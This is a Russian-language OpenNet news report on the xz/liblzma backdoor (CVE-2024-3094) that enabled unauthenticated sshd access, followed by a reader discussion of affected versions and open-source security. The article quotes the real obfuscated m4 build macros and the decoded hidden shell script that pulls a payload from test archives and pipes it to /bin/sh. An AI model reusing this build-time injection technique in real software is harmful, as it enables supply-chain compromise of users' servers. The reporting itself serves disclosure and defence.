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В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

29.03.2024 22:18

В пакете XZ Utils, включающем библиотеку liblzma и утилиты для работы со сжатыми данными в формате ".xz", выявлен бэкдор (CVE-2024-3094), позволяющий перехватывать и модифицировать данные, обрабатываемые приложениями, связанными с библиотекой liblzma. Основной целью бэкдора является сервер OpenSSH, в некоторых дистрибутивах связанный с библиотекой libsystemd, которая, в свою очередь, использует liblzma. Связывание sshd с уязвимой библиотекой позволяет злоумышленникам получить доступ к SSH-серверу без аутентификации.

Бэкдор присутствовал в официальных выпусках 5.6.0 и 5.6.1, опубликованных 24 февраля и 9 марта, которые успели попасть в состав некоторых дистрибутивов и репозиториев, например, Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide и 40-beta, openSUSE factory и tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current, Manjaro testing. Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться на версию 5.4.6.

Из сглаживающих проблему факторов можно отметить то, что версия liblzma c бэкдором не успела войти в состав стабильных выпусков крупных дистрибутивов, но затронула openSUSE Tumbleweed и Fedora 40-beta. Arch Linux и Gentoo использовали уязвимую версию zx, но не подвержены атаке, так как не применяют к openssh патч для поддержки systemd-notify, приводящий к связыванию sshd к liblzma. Бэкдор затрагивает только системы x86_64 на базе ядра Linux и Си-библиотеки Glibc.

Код активации бэкдора был спрятан в m4-макросах из файла build-to-host.m4, используемого инструментарием automake при сборке. При сборке в ходе выполнения запутанных обфусцированных операций на основе архивов (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma), применяемых для тестирования корректности работы, формировался объектный файл с вредоносным кодом, который включался в состав библиотеки liblzma и изменял логику работы некоторых её функций. Активирующие бэкдор m4-макросы входили в состав tar-архивов релизов, но отсутствовали в Git-репозитории. При этом вредоносные тестовые архивы присутствовали в репозитории, т.е. внедривший бэкдор имел доступ как к репозиторию, так и к процессам формирования релизов.

При использовании liblzma в приложениях вредоносные изменения могли использоваться для перехвата или модификации данных, а также для влияния на работу sshd. В частности, вредоносный код подменял функцию RSA_public_decrypt для обхода процесса аутентификации в sshd. Бэкдор включал защиту от обнаружения и не проявлял себя при выставленных переменных окружения LANG и TERM (т.е. при запуске процесса в терминале) и не выставленных переменных окруужения LD_DEBUG и LD_PROFILE, а также активировался только при выполнении исполняемого файла /usr/sbin/sshd. В бэкдоре также имелись средства обнаружения запуска в отладочных окружениях.

В частности, в файле m4/build-to-host.m4 использовались конструкции 


  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
...
  gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

В первой конструкции операция grep находила файл tests/files/bad-3-corrupt_lzma2.xz, при распаковке которого формировался сценарий: 


####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

Каким образом злоумышленникам удалось получить доступ к инфраструктуре проекта xz пока до конца не выяснено. Так же пока не ясно как много пользователей и проектов были скомпрометированы в результате действия бэкдора. Предполагаемый автор бэкдора (JiaT75 - Jia Tan), разместивший в репозитории архивы с вредоносным кодом, переписывался с разработчиками Fedora и отправлял pull-запросы в Debian, связанные с переходом дистрибутивов на ветку xz 5.6.0, и не вызвал подозрений, так как участвовал в разработке xz на протяжении последних двух лет и является вторым разработчиком по числу внесённых изменений. Помимо проекта xz предполагаемый автор бэкдора также участвовал в разработке пакетов xz-java и xz-embedded. Более того, Jia Tan несколько дней назад был включён в число мэёнтейнеров проекта XZ Embedded, используемого в ядре Linux.

Вредоносное изменение было выявлено после анализа излишнего потребления CPU и ошибок, выдаваемых valgrind, при подключении через ssh к системам на базе Debian sid. Примечательно, что в релиз xz 5.6.1 были включены изменения, подготовленные предполагаемым автором бэкдора в ответ на жалобы о замедлении работы и сбоях sshd, возникшие после обновления до версии zx 5.6.0 с бэкдором. Кроме того, в прошлом году Jia Tan внёс изменения, несовместимые с режимом проверки "-fsanitize=address", что привело к его отключению при fuzzing-тестировании.

  1. Главная ссылка к новости (https://www.openwall.com/lists...)
  2. OpenNews: В deb-пакетах с Free Download Manager найден бэкдор, который оставался незамеченным три года
  3. OpenNews: В UEFI-прошивках материнских плат Gigabyte выявлена активность, напоминающая бэкдор
  4. OpenNews: Бэкдор в 93 плагинах и темах оформления AccessPress, применяемых на 360 тысячах сайтов
  5. OpenNews: Вредоносное ПО, поражающее NetBeans для внедрения бэкдоров в собираемые проекты
  6. OpenNews: В Webmin найден бэкдор, позволяющий удалённо получить доступ с правами root
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/60877-backdoor
Ключевые слова: backdoor, xz, liblzma, ssh
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (47) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, semester (ok), 22:43, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    И как понять что тот бекдор успел натворить? Если он больше месяца существует.
     
     
  • 2.4, Bonbon (?), 22:50, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    For our openSUSE Tumbleweed users where SSH is exposed to the internet we recommend installing fresh, as it’s unknown if the backdoor has been exploited. Due to the sophisticated nature of the backdoor an on-system detection of a breach is likely not possible. Also rotation of any credentials that could have been fetched from the system is highly recommended.
    https://news.opensuse.org/2024/03/29/xz-backdoor/
     
  • 2.9, Alexander_R (ok), 22:59, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Не просто больше месяца существует - автор бэкдора 2 года в проекте (!!) и отправлял к нему многочисленные патчи с исправлениями (в том числе для повышения скрытности).

    При этом явно предпринималась попытка замаскировать полную компроментацию проекта xz под "всего лишь" компроментацию тарболов, а сам бэкдор не активировался если запускать исполняемые файлы с поражённой liblzma в терминале. Не известно, единственный ли это бэкдор или были другие (а ещё аккаунт автора вовлечён в разработку кучи других проектов, таких как java-версия xz...)

    Не исключено, что к моменту публикации новости аффтар уже почистил за собой все следы и перезагрузил за вас ваши сервера 0_o

     
     
  • 3.10, Ано ним (?), 23:14, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    откуда дровишки?
     
     
  • 4.14, Alexander_R (ok), 23:24, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    В обсуждении на openwall много чего есть из не упомянутого в новости.
     

  • 1.5, FSA (??), 22:51, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Короче. Инцидент был и он в дистрибутивах был, которые никто в здравом уме не будет ставить на прод. А ломать домашние машины... которые по какой-то причине выставлены в сеть... ну это цель нужна и ждать подходящего момента... сомнительное удовольствие.
     
     
  • 2.7, Аноним (7), 22:56, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Создать ботнет и наехать на "конкретных" , не ?
     

  • 1.6, Перастерос (ok), 22:52, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    найти и наказать гада — это одно, не допускать такого в принципе — другое..
     
     
  • 2.33, Аноним (33), 00:18, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Во! Если уж бэкдор, то только хардварный, только хардкор! Не допускать васянство!
     

  • 1.8, kusb (?), 22:58, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    хз-utils, ну что, уважаемо, эпично. Эта библиотека есть прям везде. И самое дурное, ведь архиватору не нужен доступ почти ни к чему. Но такой изоляции нет.
     
     
  • 2.13, sesto (?), 23:23, 29/03/2024 Скрыто ботом-модератором     [к модератору]
    		• –1 +/
     

  • 1.11, birdie (ok), 23:15, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –13 +/
    Я уже много лет говорю об этой проблеме и о том, как плохо обстоят дела с безопа... большой текст свёрнут, показать
     
     
  • 2.15, Аноним (15), 23:27, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Все ок, но про одобрение каждой строчки кода уже слишком жирно
     
     
  • 3.24, birdie (ok), 23:49, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Да, примерно так.

    Причём код проверяет не один человек, а несколько.

    Жирно - это к open source. На первой странице Opennet это уже вторая (!) новость про то, что ни черта никто не проверяет, а эту уязвимость просто случайно (!) обнаружили, потому что код трояна был кривой и вызывал задержки в работе SSHD.

     
  • 2.18, Аноним (18), 23:29, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    Каким боком здесь безопасность линукса? Это не дыра в ядре, не эскалация привилегий, а банальный троян в пользовательском приложении.

    В винде же троянов не бывает, а майкрософт лично проверяет код каждого экзешника в интернете. Не забудь принять таблетки.

     
     
  • 3.19, semester (ok), 23:33, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    ну объективно говоря от этого приложения зависит пол системы. Может я не прав, но получается ты ставишь "winrar" и половина винды от него зависит.
     
     
  • 4.27, Аноним (18), 00:02, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Да, но если так же скомпрометировать популярную библиотеку на винде, разница будет лишь в том, что копия вирусной dll-ки будет лежать в комплекте у каждого отдельного приложения.
    Что кстати ЗНАЧИТЕЛЬНО усложняет процесс обезвреживания, ведь нельзя просто обновить 1 пакет, а придется обновлять КАЖДОЕ приложение у которого эта dll в комплекте.
     
  • 3.20, birdie (ok), 23:46, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    > В винде же троянов не бывает, а майкрософт лично проверяет код каждого экзешника в интернете. Не забудь принять таблетки.

    Примеры backdoors в продуктах Microsoft в студию. Хотя бы один за 40 с лишним лет, что они существуют.

    > а майкрософт лично проверяет код каждого экзешника в интернете

    Я говорил про software, который создаёт и распространяет сама MS официально. Мне плевать на то, кто и что "распространяет в Интернет". Начните с умения читать и понимать написанное - у вас с этим проблемы.

    > Не забудь принять таблетки.

    Попробуй мне это в лицо сказать, анонимный тролль.

     
     
  • 4.25, Аноним (18), 23:56, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    > Примеры backdoors в продуктах Microsoft в студию.

    Сначала ты примеры backdoors в продуктах Linux Foundation в студию.

    > Я говорил про software, который создаёт и распространяет сама MS официально. Мне плевать на то, кто и что "распространяет в Интернет".

    То есть все люди на винде пользуются исключительно приложениями от MS и никакими другими? Ну-ну.

     
     
  • 5.40, Аноним (40), 00:32, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Ну вот буквально несколько дней назад нашли в Fedora (продукте redhat, платинового спонсора lf). Прув: https://www.opennet.ru/cgi-bin/openforum/vsluhboard.cgi?az=post&om=133254&foru
     
  • 5.45, Fyjy (-), 00:37, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Да легко!
    Как насчет Bvp47 ?
    По слухам связан с NSA, но проверить естественно невозможно.
    "287 organizations in 45 countries and went largely undetected for over 10 years"

    Вот оно качество поделок от линукс фаундейшн, не зря же Линус получай лям в месяц, ну.. от уважаемых партнеров.

    А еще можно вспомнить уязвимости в драйверах.
    Да практически каждую вторую RCE в ядре с получением рута можно считать бекдором, замаскированным под "сишник опять обделался и вышез за границы буфера"

     
     
  • 6.51, Аноним (18), 00:45, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Так падажи, но если считать дыры за умышленные бэкдоры, то винда тогда по этому критерию чемпион вне конкуренции получается. А если еще учесть, что довольно много кода в ядро вносят работники MS...
    Тут как говорится, если слишком тщательно расследовать дело, то можно случайно выйти на себя.
     
  • 4.28, Аноним (28), 00:07, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Примеры backdoors в продуктах Microsoft в студию. Хотя бы один за 40 с лишним лет, что они существуют.

    Вы серьёзно? Тут даже сложно комментировать ибо вы похоже очень многое пропустили... Вы хоть знаете фамилию президанта РФ? :)

     
  • 4.36, Аноним (36), 00:28, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Держи. Не захлебнись только.

    https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-32238/Mi

     
     
  • 5.50, birdie (ok), 00:45, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Разницу между malware/backdoor и vulnerability чувствуете? Видимо, вообще нисколько.
     
  • 4.38, Аноним (38), 00:28, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    "Предполагаемый автор бэкдора" и у MS отметился
    https://learn.microsoft.com/en-US/cpp/overview/whats-new-cpp-docs?view=msvc-17
     
  • 2.23, твёрдый ветер (?), 23:48, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    >В то время как крупные корпорации, такие как Microsoft, Google или Apple, одобряют каждую строчку кода, которая попадает к вам как к клиенту

    можно поподробнее о том как крупные корпорации одобряют каждую строчку кода ?

     

  • 1.12, Ано ним (?), 23:17, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    > сервер OpenSSH, в котором используется liblzma

    Это не правда. В sshd не используется liblzma. SSHd _можно_ собрать, слинковав с libsystemd, который в свою очередь, зависит от liblzma. Читайте оригинал сообщения https://www.openwall.com/lists/oss-security/2024/03/29/4

     
     
  • 2.17, birdie (ok), 23:29, 29/03/2024 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    sshd дёргает метод из systemd, который дёргает liblzma.

    То, что вы в своём Gentoo/LFS/Devuan извращаетесь, не имеет отношения к новости.

    Она про Fedora 40/Rawhide/Debian SID, и they are all f*cked.

     
     
  • 3.30, Аноним (30), 00:10, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Учитывая, что разрабатывают openssh разработчики openbsd, то вопрос кто тут извращается с libsystemd, остаётся открытым
     
  • 3.43, Аноним (43), 00:34, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Нету в проекте openssh никаких обращений к libsystemd и тем более методов Умн... большой текст свёрнут, показать
     
  • 2.53, Ivan_83 (ok), 00:50, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Тоже не понимал причём тут xz, пришлось читать оригинал:

    > openssh does not directly use liblzma. However debian and several other
    > distributions patch openssh to support systemd notification, and libsystemd
    > does depend on lzma.

     

  • 1.16, Аноним (15), 23:29, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Вообще xz это зло: https://www.nongnu.org/lzip/xz_inadequate.html
     
     
  • 2.41, Аноним (40), 00:34, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    А что насчёт zstd? Бяка типа xz или что-то приятное типа gz/lz? Есть информация?
     
  • 2.42, Аноним (42), 00:34, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Слишком много букв. А что они там предлагают для long-term archiving?
     

  • 1.22, Аноним (28), 23:47, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Gentoo проблема с sshd не аффектит, так как там не используют патчи для systemd-notify: https://bugs.gentoo.org/show_bug.cgi?id=CVE-2024-3094#c3
     
  • 1.29, Аноним (33), 00:07, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться на версию 5.4.6.

    xz --version
    xz (XZ Utils) 5.4.1
    liblzma 5.4.1

    Хакеры 0 : 1 Debian stable

     
     
  • 2.35, Skullnet (ok), 00:25, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    xz --version
    xz (XZ Utils) 5.2.5
    liblzma 5.2.5

    У меня ещё древнее.

     
     
  • 3.48, Аноним (48), 00:40, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    А вот у тебя 4 летняя, но сидеть на старостабильной ветке и не ставить на неё обновления старостабильной ветки тоже аутизм
     
  • 2.46, Аноним (48), 00:38, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Все версии за 2 года содержат код этого автора, у тебя слишком сырая версия.
     

  • 1.32, Аноним (30), 00:15, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    В pkgsrc уже откатились - https://pkgsrc.se/archivers/xz

    Но в самом образе NetBSD вообще 5.2.4 версия

     
  • 1.34, Аноним (34), 00:20, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Чувак не виноват, ему просто copilot сделал автоподстановку и он случайно нажал на Tab
     
  • 1.39, Аноним (-), 00:32, 30/03/2024 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
    		• –1 +/
     
  • 1.44, birdie (ok), 00:36, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Всё ещё веселей: https://github.com/google/oss-fuzz/issues/11760#issuecomment-2027602656
     
  • 1.47, Аноним (47), 00:39, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    fedora
    $ xz --version
    xz (XZ Utils) 5.4.4
    liblzma 5.4.4

    ubuntu
    $ xz --version
    xz (XZ Utils) 5.2.5
    liblzma 5.2.5

    debian
    $ xz --version
    xz (XZ Utils) 5.4.1
    liblzma 5.4.1

    Фух. Пронесло =)

     
  • 1.49, Аноним (42), 00:41, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться на версию 5.4.6.

    Ну, ладно.

    > https://security.archlinux.org/ASA-202403-1

    А эти пишут, что "The problem has been fixed upstream in version 5.6.1."

     
     
  • 2.54, Аноним (40), 00:55, 30/03/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    "Эти" рекомендуют ставить не просто 5.6.1, а 5.6.1-2 , в которой бинарник собирается из архива, взятого непосредственно с гитхаба, а не из официального источника. Судя по новости, этот бинарник без проблем. См. https://gitlab.archlinux.org/archlinux/packaging/packages/xz/-/commit/88138575
     

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